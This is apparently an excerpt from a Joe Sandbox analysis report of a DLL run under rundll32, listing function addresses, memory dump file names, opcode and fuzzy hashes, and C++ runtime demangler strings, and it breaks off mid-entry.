                                                                                                                                                                                                                            Function 000000018001DE74 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: f03f402daf764cb1523d67440daaa0efa083cfb75c9a5114f08d9bd7f9b10615
                                                                                                                                                                                                                            • Instruction ID: f5b93211fe77b29487fa4fd257d5fde96400bce1abed37a72afd91fb1e027c2e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f03f402daf764cb1523d67440daaa0efa083cfb75c9a5114f08d9bd7f9b10615
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28318172204A48C6DB618F29D04039D7BA0F39DB8CF248129EB4D4B751CF36C696CB04
                                                                                                                                                                                                                            Function 000000018001CEF0 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 77b783239df9655da23e022cacfdefe35c78de26ffe6e70fc2e8dc86fced0d4d
                                                                                                                                                                                                                            • Instruction ID: 194b00cc888e2e2f76d18caba169315b46a1a6f577439443e2a011904a615860
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 77b783239df9655da23e022cacfdefe35c78de26ffe6e70fc2e8dc86fced0d4d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 24318F72204B8886EB618F29D0807AD7BA1F38DB8CF258129EB8D4B751CF36C197C704
                                                                                                                                                                                                                            Function 000000018001FF38 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: b73871e068712f36eee8871fd14f195e2b24532075d4a97a50186b990cf6f83a
                                                                                                                                                                                                                            • Instruction ID: 591a8b1ba5a30be0745f61d02a2f059f1082fcfd71fc81c5500a2eb06f863d3f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b73871e068712f36eee8871fd14f195e2b24532075d4a97a50186b990cf6f83a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 88317372214B44C6EB668F29D0807AD77A0F79DB8CF258125EB4C4B751DF36C596C704
                                                                                                                                                                                                                            Function 000000018001DF78 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: b0678b5f7f41e8ed18b4c833753bed08d769c1d4fa40b64cb2ab62f13897cfc6
                                                                                                                                                                                                                            • Instruction ID: 5f929aeef531411b7e5b79e2177385f394510b7efe59779f291d9e0075065973
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b0678b5f7f41e8ed18b4c833753bed08d769c1d4fa40b64cb2ab62f13897cfc6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8C318472604B84C6EB628F19D0407AD77A0F39DB8CF25812AEB8D4B751DF76C596CB04
                                                                                                                                                                                                                            Function 000000018001F0D0 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: c3a5a19ed80b8995905a0f4dfd43a95064d3eb8d941ef491714124307759d058
                                                                                                                                                                                                                            • Instruction ID: d255ba662003b5b31c06570ed5e5e9bea97b7bba24fbd21a524e5e1be1e043b0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c3a5a19ed80b8995905a0f4dfd43a95064d3eb8d941ef491714124307759d058
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DB318BB2204A88C6EB62CF29D4503AD7BA0E39DB9CF248125EB4D4B751CF36C186CB04
                                                                                                                                                                                                                            Function 000000018001F1D8 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: d44bd70bc6015b3d1f49a97206f05c35f0f6160655a92f1eccb5653207e466e8
                                                                                                                                                                                                                            • Instruction ID: bc597acf5a428f691249d9059912e689e69dd116c41c26ad32cbfa4a0e45a452
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d44bd70bc6015b3d1f49a97206f05c35f0f6160655a92f1eccb5653207e466e8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A731A0B6204A88C6EB61CF29D0403AD77A0F79DB8CF248125EB4C0B754DF36C596CB04
                                                                                                                                                                                                                            Function 000000018001F2E0 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 152779ac33543677a745ab214faecee9ca20cc5ff215e41aa1567f68b84ccd02
                                                                                                                                                                                                                            • Instruction ID: 22daad4b15ba582d715adedd4d5b9cdfed6252c85e01f7afa18a3de6ab25d7e3
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 152779ac33543677a745ab214faecee9ca20cc5ff215e41aa1567f68b84ccd02
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7431A0B2204A88C6EB65CF29D0403AD77A0F79DB8CF258125EB5C4B751DF36C696CB04
                                                                                                                                                                                                                            Function 000000018001EFC8 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 1c19f3c415a113fe8911b991a8fb318b5500f58eb07268b365c12c972f886189
                                                                                                                                                                                                                            • Instruction ID: 16190bf0ccc22a367e0d8f1997b9cbed130ccd7f1d444c620491dbcdfbc95729
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c19f3c415a113fe8911b991a8fb318b5500f58eb07268b365c12c972f886189
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1F317172204A88C6EB66CF29D0403AD77A0F79DB9CF258125EB4D4B752DF36C556CB04
                                                                                                                                                                                                                            Function 0000000180013CD4 Relevance: 58.1, APIs: 4, Strings: 29, Instructions: 382COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                                                                                            • String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $auto$bool$char$char16_t$char32_t$char8_t$const$decltype(auto)$double$float$int$long$long $short$signed $this $unsigned $void$volatile$wchar_t
                                                                                                                                                                                                                            • API String ID: 2943138195-1482988683
                                                                                                                                                                                                                            • Opcode ID: f5b08725d49e3936faf24a31500805328ba618e891ce830165a6676dc23d0718
                                                                                                                                                                                                                            • Instruction ID: aba4e943f25002773c1e8b8ff256808fc8ff7469cd32bafab8b6d36a2db658ad
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f5b08725d49e3936faf24a31500805328ba618e891ce830165a6676dc23d0718
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E024E72A10F18D8FBA6CB68D8953ED27B1B31D7C4F608119EA091AAA8DF74C74DC740
                                                                                                                                                                                                                            Function 00000001800177FC Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 290COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Name::operator+$Replicator::operator[]
                                                                                                                                                                                                                            • String ID: `anonymous namespace'
                                                                                                                                                                                                                            • API String ID: 3863519203-3062148218
                                                                                                                                                                                                                            • Opcode ID: 99c0d059bb14feceadd0ebac364fdec140f15412be5d4b7962f4a11c550691ce
                                                                                                                                                                                                                            • Instruction ID: 780ad3a83c53e58fc5f4bcda82df12fb3de2ceedc09e18eee4d15cf768c518c0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 99c0d059bb14feceadd0ebac364fdec140f15412be5d4b7962f4a11c550691ce
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D2E14872604B8899EBA28F64E8803DD77B1F349788F908115FA8D17B96DF38C659C740
                                                                                                                                                                                                                            Function 0000000180018768 Relevance: 21.4, APIs: 6, Strings: 6, Instructions: 359COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: NameName::$Name::operator+swprintf
                                                                                                                                                                                                                            • String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$lambda$nullptr
                                                                                                                                                                                                                            • API String ID: 130963256-2441609178
                                                                                                                                                                                                                            • Opcode ID: 1b7cca95e2e488a3e0c80d76d27b89714392a22bae90429b9d429f6739e61c38
                                                                                                                                                                                                                            • Instruction ID: 2de753167b07bd77337a4f86cbd4a1a1ff146968b76736af4f3f81d3ad70022d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1b7cca95e2e488a3e0c80d76d27b89714392a22bae90429b9d429f6739e61c38
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0FF1AF72604E1889FBD79BA4C9953FC27A1AF0D7C4F54C116FA0A27A96DF38874DA301
                                                                                                                                                                                                                            Function 0000000180015C48 Relevance: 19.9, APIs: 13, Instructions: 361COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2943138195-0
                                                                                                                                                                                                                            • Opcode ID: d75365040a848f4e962de2583f4bdf6dcab0124c40e345c2fd97b6724785b456
                                                                                                                                                                                                                            • Instruction ID: 59aeec8a3cdcdbcd6b95e25ddd39330fc951fab43e09b50c7be90718a66a7329
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d75365040a848f4e962de2583f4bdf6dcab0124c40e345c2fd97b6724785b456
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CCF13D76B04A889EEB52DFA4E4903EC77B1E30978CF448016FA496BA96DF34C65DC340
                                                                                                                                                                                                                            Function 0000000180013980 Relevance: 16.7, APIs: 11, Instructions: 158COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2943138195-0
                                                                                                                                                                                                                            • Opcode ID: a7deb5bfb90b94af832b3ced5090f2e4193ca0aafd624f38f0026d8047bab8f3
                                                                                                                                                                                                                            • Instruction ID: 318727eee5e13463933b1bdaa130879d0bade3f0a89f414074ac98ea7bab58df
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a7deb5bfb90b94af832b3ced5090f2e4193ca0aafd624f38f0026d8047bab8f3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AD711C72710A49AAFB52DFA4D4913DC37B1A7487CCF808515EE4967A99EF30C71AC390
                                                                                                                                                                                                                            Function 000000018001994C Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 192COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
